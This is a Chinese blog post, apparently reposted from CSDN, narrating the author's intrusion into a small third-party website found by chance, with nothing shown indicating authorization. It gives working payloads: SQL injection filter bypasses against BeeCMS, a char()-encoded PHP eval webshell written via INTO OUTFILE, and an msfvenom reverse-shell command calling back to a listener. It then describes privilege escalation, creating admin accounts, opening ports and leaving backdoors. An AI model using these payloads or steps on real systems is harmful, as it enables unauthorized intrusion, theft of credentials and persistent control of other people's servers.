0
  • 聊天消息
  • 系统消息
  • 评论与回复
登录后你可以
  • 下载海量资料
  • 学习在线课程
  • 观看技术视频
  • 写文章/发帖/加入社区
会员中心
创作中心

完善资料让更多小伙伴认识你,还能领取20积分哦,立即完善>

3天内不再提示

记录某一次无意点开的一个小网站的渗透过程

工程师邓生 来源:CSDN 作者:Deilty 2022-09-09 09:09 次阅读
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

记录某一次无意点开的一个小网站的渗透过程,幸运的是搭建平台是phpstudy,cms是beecms,beecms有通用漏洞,然后去网上找了资料,成功getshell并获取服务器权限。

一、渗透过程

无意点开一个网站,发现网站比较小,且看起来比较老,然后发现logo没有改,于是乎去百度搜索这个cms,发现有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

这里运气比较好,没有更改后台地址,还是默认地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通过通用漏洞发先后台管理处存在sql注入漏洞,直接输入admin’,然后就会报错,这里用万能密码不能登陆,看来还是得通过上面得通用漏洞来进行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到输入payload后,页面返回正常,从而可以判断有sql注入,这里采用双写进行绕过a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

发现这个注入点后,就有各种各样的注入方式了,通过sql语句写入一句话,sqlmap一把梭,手工注入得到账号密码等等,怎么方便怎么来,这里我把几种方法都写一下,看看那种方法可以

方法一

1.通过post抓包sqlmap一把梭,dump出管理员账号密码,进后台找上传点

2.一把梭,发现并没有,使用脚本也没有绕过

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通过burp抓包,写入一句话,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,发现写入失败,前面讲到有防护,这里通过hex编码或者char函数绕过

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.对shell部分进行编码

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.写入shell的payload为:注意:记得在编码转换的时候前面加0x或者直接用unhex函数,但是本次实验用unhex函数一直失败,所以在前面加0x,看到可以写入成功。

ps:这里的写入路径纯属盲猜,运气好,默认目录

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蚁剑连接,成功连接,至此getshell完毕,下来就是后渗透阶段,后面会讲

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函数绕过:mysql内置函数char()可以将里面的ascii码转换为字符串,payload为:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一样成功写入

1.写入成功后,菜刀可以连接,我们访问写入的文件,惊奇的发现竟然有admin,和一串md5码,大胆猜测可能是后台账号和密码,试一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陆,然后就是后台找上传了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后渗透

通过whoami查看权限,发现是admin权限,但是不是最高权限,我们要提到最高权限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通过msf生成木马提权,payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通过蚁剑上传木马,并执行。执行之前打开msf使用模块use exploit/multi/handler,设置相应参数,然后开始监听

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么问题,用这个没有成功,那么只能通过大马提权了

方法二

1.上传大马,此处应该有狗或者盾之类的,用的免杀,成功上传

2.访问大马

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.这里提权方式很多,就不细说了,有大马之后很多操作都可以引刃而解了,开放端口,添加账号,留后门。。等等

4.创建admin权限账号之后,登陆服务器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的发现

通过扫描目录,还发现有phpmyadmin,可以爆破,这里我试了下竟然是弱口令,都是root,但是连接不上,只能通过phpmyadmin登陆,发现是低版本的phpstudy搭建的,这里就可以另一种思路,利用日志文件写入一句话getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、总结 1.前台sql注入获取用户名密码,进入后台找上传 2.SQL注入语句写入一句话 3.phpmyadmin一句话getshell 4.上传大马提权

至此,渗透结束。


审核编辑:刘清

声明:本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人,不代表电子发烧友网立场。文章及其配图仅供工程师学习之用,如有内容侵权或者其他违规问题,请联系本站处理。 举报投诉
  • SQL
    SQL
    +关注

    关注

    1

    文章

    807

    浏览量

    46932
  • 编码
    +关注

    关注

    6

    文章

    1040

    浏览量

    57132
  • ASCII
    +关注

    关注

    5

    文章

    172

    浏览量

    36819

原文标题:实战 | 一次小网站渗透过程

文章出处:【微信号:菜鸟学信安,微信公众号:菜鸟学信安】欢迎添加关注!文章转载请注明出处。

收藏 人收藏
加入交流群
微信小助手二维码

扫码添加小助手

加入工程师交流群

    评论

    相关推荐
    热点推荐

    一次调频如何影响我们的日常生活?

    守护者”——一次调频。很多人没听过它的名字,但它每时每刻都在默默工作,用毫秒级的响应守护着我们的日常生活。今天就用大白话聊聊,一次调频到底怎么影响我们的日常用电。
    的头像 发表于 04-07 14:58 563次阅读
    <b class='flag-5'>一次</b>调频如何影响我们的日常生活?

    一次调频vs二调频,电力调节的“兄弟组合”有何不同?

    在电力系统的频率稳定保障体系中,一次调频与二调频就像对默契配合的“兄弟组合”:冲锋在前、极速响应,
    的头像 发表于 03-30 15:21 691次阅读
    <b class='flag-5'>一次</b>调频vs二<b class='flag-5'>次</b>调频,电力调节的“兄弟组合”有何不同?

    GD32 usbcdc单片机从机只发送,串口打开第一次自动发最后一次测量的值

    关闭串口,测量会儿(还在发送值),关闭测量(不发值),此时打开串口,按理来说应该没有值,但是会保留最后一次测量的发送值,这个过程完全没有receive(如果是PC主机发单片机回应,这是正常的)就只
    发表于 02-04 10:24

    与轴一次成型的微电机转子磁铁

    在微型电机领域,与轴一次成型的转子磁铁正逐渐成为种被广泛采用的结构方案,相比传统“磁铁+转轴后装配”的形式,这类转子在结构、性能和致性方面都有明显优势,特别适合对体积、精度和可靠性要求较高的微电机应用。
    的头像 发表于 01-27 11:40 472次阅读
    与轴<b class='flag-5'>一次</b>成型的微电机转子磁铁

    如何判断一次消谐器是否工作正常?

    判断一次消谐器是否正常,其实就看它有没有“扛住”系统电压、及时“泄放”谐振能量,同时自己保持“健康”状态。核心方法是‌外观检查、电气参数测试和运行状态观察‌三管齐下。
    的头像 发表于 01-22 10:27 331次阅读
    如何判断<b class='flag-5'>一次</b>消谐器是否工作正常?

    光伏一次调频设备/一次调频装置|光伏一次调频涉网试验/光伏电站一次调频建设改造方案

    2025年以来能源局下发通知要求10KV以上的新能源厂站要具备一次调频能力,并递交涉网试验报告。对于投资规模不大的工商业分布式光伏电站,又要面临改造投资问题,压力较大。如何选择质优价廉的一次调频产品
    的头像 发表于 01-17 08:54 1627次阅读
    光伏<b class='flag-5'>一次</b>调频设备/<b class='flag-5'>一次</b>调频装置|光伏<b class='flag-5'>一次</b>调频涉网试验/光伏电站<b class='flag-5'>一次</b>调频建设改造方案

    光伏一次调频设备,光伏电站一次调频建设改造方案

    地控制机组有功功率的增减,限制电网频率变化,使电网频率维持稳定的自动控制过程。当电网频率升高时,一次调频功能要求机组快速减少有功功率的输出,反之,当电网频率下降时,一次调频装置就会减少发电机组有功功率
    发表于 01-16 20:06

    电网频率为何不能乱?一次调频装置的“维稳”逻辑

    家电故障,大到电网崩溃,都会给生产生活带来致命影响。而一次调频装置,正是守护这条“标准线”的核心力量,用毫秒级响应筑牢电网频率的“维稳”防线,详细了解一次调频装置可咨询:1.3.7-5.0.0.4-6.2.0.0。今天就来拆解:电网频率为何不能乱?
    的头像 发表于 01-14 11:41 386次阅读
    电网频率为何不能乱?<b class='flag-5'>一次</b>调频装置的“维稳”逻辑

    一次消谐器对电力系统的核心贡献

    一次消谐器(又称 PT 一次消谐装置)是安装在电压互感器一次侧中性点与地之间的非线性电阻设备,主要应用于3-66kV 中性点不接地或经消弧线圈接地的中压配电网,对保障电力系统安全稳定运行具有不可替代
    的头像 发表于 01-07 06:40 578次阅读
    <b class='flag-5'>一次</b>消谐器对电力系统的核心贡献

    车间协议战争调停者:记一次MODBUS TCP与PROFIBUS的融合实战

     车间协议战争调停者:记一次MODBUS TCP与PROFIBUS的融合实战 去年,我们团队接到改造项目:家大型锂电池制造厂希望整合其新旧设备的数据流。工厂情况很典型——新建的M
    的头像 发表于 12-22 14:10 298次阅读
    车间协议战争调停者:记<b class='flag-5'>一次</b>MODBUS TCP与PROFIBUS的融合实战

    解析一次消谐和二消谐的差异与应用场景

    装置,是两完全不同的产品。 一次消谐器主要是在电压互感器PT的开口三角处接入非线性电阻,当系统发生铁磁谐振时,非线性电阻会迅速动作,将谐振能量消耗掉,从而抑制谐振过电压。这种方式直接作用于一次系统,能快速有效的消
    的头像 发表于 12-11 11:33 646次阅读

    固定式测斜仪多久需要校准一次?

    多数工程环境下,固定式测斜仪应每12月进行一次全面校准。对于滑坡体监测、深基坑等高危场景,因位移数据直接影响预警决策,建议缩短至每6月校准一次。新设备首次安装
    的头像 发表于 08-13 14:47 901次阅读
    固定式测斜仪多久需要校准<b class='flag-5'>一次</b>?

    adxl355读数异常,三轴中某一轴数据始终为0怎么解决?

    adxl355芯片,我这边做了批设备,开始全部工作正常,后续有一次经拆装后,个别出现了三轴中某一轴读数全为0的情况,其余两轴读数正常(还有一个
    发表于 08-13 07:32

    智能客服驱动效率和体验升级,上海电信+昇腾AI的一次民生应用实践

    上海电信+昇腾AI的一次民生应用实践
    的头像 发表于 07-30 23:44 3071次阅读
    智能客服驱动效率和体验升级,上海电信+昇腾AI的<b class='flag-5'>一次</b>民生应用实践

    一次消谐装置与二消谐装置区别、一次消谐器与二消谐器的区别

    一次消谐器与二消谐器是电力系统中用于抑制谐振过电压的不同装置,主要区别如下: 安装位置:一次消谐器串联于电压互感器(PT)一次侧中性点与地之间,直接承受高电压;二
    的头像 发表于 05-07 09:58 4896次阅读
    <b class='flag-5'>一次</b>消谐装置与二<b class='flag-5'>次</b>消谐装置区别、<b class='flag-5'>一次</b>消谐器与二<b class='flag-5'>次</b>消谐器的区别